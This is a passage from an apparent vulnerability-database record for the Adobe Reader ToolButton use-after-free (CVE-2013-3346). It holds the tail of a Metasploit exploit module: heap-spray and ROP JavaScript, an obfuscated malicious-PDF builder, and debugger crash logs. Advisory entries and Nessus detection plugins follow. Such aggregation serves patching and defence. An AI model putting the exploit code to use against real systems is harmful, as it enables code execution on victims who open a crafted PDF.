bbb = bbb.substring(0, i11 / 2);\n bbb += str;\n bbb += aaa;\n var i2 = 0x4000 + 0xc000;\n var ccc = bbb.substring(0, i2 / 2);\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\n var i3 = (0x1020 - 0x08) / 2;\n var ddd = ccc.substring(0, 0x80000 - i3);\n var eee = new Array();\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\n return;\n}\nvar shellcode = unescape(\"#{escaped_payload}\");\nvar executable = \"\";\nvar rop9 = unescape(\"#{rop_9}\");\nvar rop10 = unescape(\"#{rop_10}\");\nvar rop11 = unescape(\"#{rop_11}\");\nvar r11 = false;\nvar vulnerable = true;\n\nvar obj_size;\nvar rop;\nvar ret_addr;\nvar rop_addr;\nvar r_addr;\n\nif (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {\n obj_size = 0x330 + 0x1c;\n rop = rop9;\n ret_addr = unescape(\"%ua83e%u4a82\");\n rop_addr = unescape(\"%u08e8%u0c0c\");\n r_addr = 0x08e8;\n} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\n obj_size = 0x360 + 0x1c;\n rop = rop10;\n rop_addr = unescape(\"%u08e4%u0c0c\");\n r_addr = 0x08e4;\n ret_addr = unescape(\"%ua8df%u4a82\");\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\n r11 = true;\n obj_size = 0x370;\n rop = rop11;\n rop_addr = unescape(\"%u08a8%u0c0c\");\n r_addr = 0x08a8;\n ret_addr = unescape(\"%u8003%u4a84\");\n} else {\n vulnerable = false;\n}\n\nif (vulnerable) {\n var payload = rop + shellcode;\n heapSpray(payload, ret_addr, r_addr);\n\n var part1 = \"\";\n if (!r11) {\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\n }\n part1 += rop_addr;\n var part2 = \"\";\n var part2_len = obj_size - part1.length * 2;\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\n var arr = new Array();\n\n removeButtonFunc = function () {\n app.removeToolButton({\n cName: \"evil\"\n });\n\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\n }\n\n addButtonFunc = function () {\n app.addToolButton({\n cName: \"xxx\",\n cExec: 
\"1\",\n cEnable: \"removeButtonFunc();\"\n });\n }\n\n app.addToolButton({\n cName: \"evil\",\n cExec: \"1\",\n cEnable: \"addButtonFunc();\"\n });\n}\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(js)\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(4) << eol\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(6) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(3) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # js action\n xref << 
pdf.length\n pdf << io_def(4) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(5)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(5) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(6)\n pdf << n_obfu(\"<</XFA \") << io_ref(7) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll / icucnv40.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n\n\n=begin\n\n* crash Adobe Reader 10.1.4\n\nFirst chance exceptions are reported before any exception handling.\nThis exception 
may be expected and handled.\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\n\n* crash Adobe Reader 11.0.2\n\n(940.d70): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\n\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_toolbutton.rb"}], "canvas": [{"lastseen": "2019-05-29T19:48:21", "bulletinFamily": "exploit", "description": "**Name**| acrobat_toolbutton \n---|--- \n**CVE**| CVE-2013-3346 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| acrobat_toolbutton \n**Notes**| CVE Name: CVE-2013-3346 \nVENDOR: Adobe \nNOTES: \nThis exploit has been tested on: \n \n\\- Windows XP SP3 EN Acrobat Reader 11.0.2/11.0.1/10.1.4/10.1.2/10.1.1/10.1.0 \n \nVulnerable versions include: \n \n<= 11.0.2 \n<= 10.1.6 \n<= 9.5.4 \n \nRepeatability: \nReferences: http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html \nCVE Url: 
http://www.adobe.com/support/security/bulletins/apsb13-15.html \n\n", "modified": "2013-08-30T20:55:00", "published": "2013-08-30T20:55:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_toolbutton", "id": "ACROBAT_TOOLBUTTON", "type": "canvas", "title": "Immunity Canvas: ACROBAT_TOOLBUTTON", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:40:27", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201309-10\n(Adobe Reader: Arbitrary Code Execution)\n\n An unspecified vulnerability exists in Adobe Reader.\n \nImpact :\n\n An attacker could execute arbitrary code or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201309-10.NASL", "href": "https://www.tenable.com/plugins/nessus/69901", "published": "2013-09-15T00:00:00", "title": "GLSA-201309-10 : Adobe Reader: Arbitrary Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201309-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69901);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2013-3346\");\n script_bugtraq_id(62149);\n script_xref(name:\"GLSA\", value:\"201309-10\");\n\n script_name(english:\"GLSA-201309-10 : Adobe Reader: Arbitrary Code Execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201309-10\n(Adobe Reader: Arbitrary Code Execution)\n\n An unspecified vulnerability exists in Adobe Reader.\n \nImpact :\n\n An attacker could execute arbitrary code or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201309-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.5.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 9.5.5\"), vulnerable:make_list(\"lt 9.5.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:43", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5 
and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws\nare detailed in the Adobe Security bulletin APSB13-15, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2013-2549, CVE-2013-2718,\nCVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722,\nCVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726,\nCVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731,\nCVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735,\nCVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\nCVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2013-0826.NASL", "href": "https://www.tenable.com/plugins/nessus/66458", "published": "2013-05-16T00:00:00", "title": "RHEL 5 / 6 : acroread (RHSA-2013:0826)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0826. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66458);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/10/24 15:35:37\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3346\");\n script_bugtraq_id(58398, 59851);\n script_xref(name:\"RHSA\", value:\"2013:0826\");\n\n script_name(english:\"RHEL 5 / 6 : acroread (RHSA-2013:0826)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws\nare detailed in the Adobe Security bulletin APSB13-15, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. 
(CVE-2013-2549, CVE-2013-2718,\nCVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722,\nCVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726,\nCVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731,\nCVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735,\nCVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\nCVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb13-15.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb13-15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2731\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2724\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2723\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2013-3337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3346\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0826\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-9.5.5-1.el5_9\")) flag++;\n\n if 
(rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-plugin-9.5.5-1.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-9.5.5-1.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-plugin-9.5.5-1.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:12:12", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. 
(CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader", "modified": "2019-11-02T00:00:00", "id": "ADOBE_ACROBAT_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/nessus/66409", "published": "2013-05-14T00:00:00", "title": "Adobe Acrobat < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66409);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n\n script_name(english:\"Adobe Acrobat < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_set_attribute(\n 